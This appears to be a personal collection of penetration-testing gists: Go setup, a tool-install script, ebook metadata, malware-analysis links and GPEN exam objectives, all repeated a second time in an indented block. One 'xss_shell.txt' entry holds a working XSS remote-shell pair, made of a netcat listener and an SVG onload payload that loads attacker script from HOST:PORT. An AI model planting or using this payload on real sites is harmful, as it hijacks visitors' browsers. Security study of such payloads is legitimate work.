setrus setrus

## Go Environemnt Installation
wget https://dl.google.com/go/go1.13.3.linux-amd64.tar.gz
sudo tar -xvf go1.13.3.linux-amd64.tar.gz
sudo mv go /usr/local

export GOROOT=/usr/local/go
export GOPATH=$HOME/go
export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
go version
go env

## To Watch
https://www.vulnerability-lab.com/

## Bug Bounty methodology

██████╗ ███████╗ ██████╗ ██████╗ ███╗   ██╗
██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗  ██║
██████╔╝█████╗  ██║     ██║   ██║██╔██╗ ██║
██╔══██╗██╔══╝  ██║     ██║   ██║██║╚██╗██║
██║  ██║███████╗╚██████╗╚██████╔╝██║ ╚████║
╚═╝  ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝  ╚═══╝

           @intx0x80

## pentest.sh
#/bin/bash

git clone https://github.com/danielmiessler/SecLists.git /opt/seclists

git clone https://github.com/s0md3v/XSStrike.git /opt/xsstrike
sudo ln -s /opt/xsstrike/xsstrike.py /usr/local/bin/xsstrike
chmod +x /opt/xsstrike/xsstrike.py

git clone https://github.com/s0md3v/Arjun.git /opt/arjun
sudo ln -s /opt/arjun/arjun.py /usr/local/bin/arjun

## content_discovery_all.txt
`
~/
~
×™×


___
__
_

## xss_shell.txt
Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done
Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>

## hpb3_links.txt
Document infos:
- Author = Peter Kim
- CreationDate = D:20180505020009+00'00'
- Creator = calibre 2.69.0 [https://calibre-ebook.com]
- Pages = 308
- Producer = calibre 2.69.0 [https://calibre-ebook.com]
- Title = The Hacker Playbook 3: Practical Guide To Penetration Testing
- dc = {'publisher': ['Secure Planet'], 'description': {'x-default': None}, 'language': ['en'], 'creator': ['Peter Kim'], 'title': {'x-default': 'The Hacker Playbook 3: Practical Guide To Penetration Testing'}, 'date': ['2018-05-01T00:00:00+02:00'], 'subject': []}
- http://calibre-ebook.com/xmp-namespace = {'timestamp': '2018-05-03T18:05:43.134685+02:00', 'author_sort': 'Kim, Peter'}
- xap = {'Identifier': ['\n            '], 'MetadataDate': '2018-05-05T04:00:09.811485+02:00'}

## Malware Analysis
https://www.sans.org/reading-room/whitepapers/threats/malware-analysis-environment-design-artitecture-1841
https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html
https://oalabs.openanalysis.net/2018/07/16/oalabs_malware_analysis_virtual_machine/

## gist:16d40c503d2181d072eb95d4f6fac338
SageMath
WinDbg Preview
Doker
GNU Radio

## GPEN Knowledge
Exam Certification Objectives and Outcome Statements
1. Advanced Password Attacks
- The candidate will be able to user additional methods to attack password hashes and authenticate

2. Attacing Password hashes
- The candidate will be able to obtain and attack passwords hashes and other password representations

3. Escalation and Exploitation
- The candidate will be able to demonstrate the fundamental conepts of exploitation, data exfiltratrion from compromised hosts and pivoting to exploit other hosts within a target network.
	wget https://dl.google.com/go/go1.13.3.linux-amd64.tar.gz
	sudo tar -xvf go1.13.3.linux-amd64.tar.gz
	sudo mv go /usr/local

	export GOROOT=/usr/local/go
	export GOPATH=$HOME/go
	export PATH=$GOPATH/bin:$GOROOT/bin:$PATH
	go version
	go env

	██████╗ ███████╗ ██████╗ ██████╗ ███╗ ██╗
	██╔══██╗██╔════╝██╔════╝██╔═══██╗████╗ ██║
	██████╔╝█████╗ ██║ ██║ ██║██╔██╗ ██║
	██╔══██╗██╔══╝ ██║ ██║ ██║██║╚██╗██║
	██║ ██║███████╗╚██████╗╚██████╔╝██║ ╚████║
	╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═══╝

	@intx0x80
	#/bin/bash

	git clone https://github.com/danielmiessler/SecLists.git /opt/seclists

	git clone https://github.com/s0md3v/XSStrike.git /opt/xsstrike
	sudo ln -s /opt/xsstrike/xsstrike.py /usr/local/bin/xsstrike
	chmod +x /opt/xsstrike/xsstrike.py

	git clone https://github.com/s0md3v/Arjun.git /opt/arjun
	sudo ln -s /opt/arjun/arjun.py /usr/local/bin/arjun
	Attacker: while :; do printf "j$ "; read c; echo $c \| nc -lp PORT >/dev/null; done
	Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)>
	Document infos:
	- Author = Peter Kim
	- CreationDate = D:20180505020009+00'00'
	- Creator = calibre 2.69.0 [https://calibre-ebook.com]
	- Pages = 308
	- Producer = calibre 2.69.0 [https://calibre-ebook.com]
	- Title = The Hacker Playbook 3: Practical Guide To Penetration Testing
	- dc = {'publisher': ['Secure Planet'], 'description': {'x-default': None}, 'language': ['en'], 'creator': ['Peter Kim'], 'title': {'x-default': 'The Hacker Playbook 3: Practical Guide To Penetration Testing'}, 'date': ['2018-05-01T00:00:00+02:00'], 'subject': []}
	- http://calibre-ebook.com/xmp-namespace = {'timestamp': '2018-05-03T18:05:43.134685+02:00', 'author_sort': 'Kim, Peter'}
	- xap = {'Identifier': ['\n '], 'MetadataDate': '2018-05-05T04:00:09.811485+02:00'}
	https://www.sans.org/reading-room/whitepapers/threats/malware-analysis-environment-design-artitecture-1841
	https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html
	https://oalabs.openanalysis.net/2018/07/16/oalabs_malware_analysis_virtual_machine/
	Exam Certification Objectives and Outcome Statements
	1. Advanced Password Attacks
	- The candidate will be able to user additional methods to attack password hashes and authenticate

	2. Attacing Password hashes
	- The candidate will be able to obtain and attack passwords hashes and other password representations

	3. Escalation and Exploitation
	- The candidate will be able to demonstrate the fundamental conepts of exploitation, data exfiltratrion from compromised hosts and pivoting to exploit other hosts within a target network.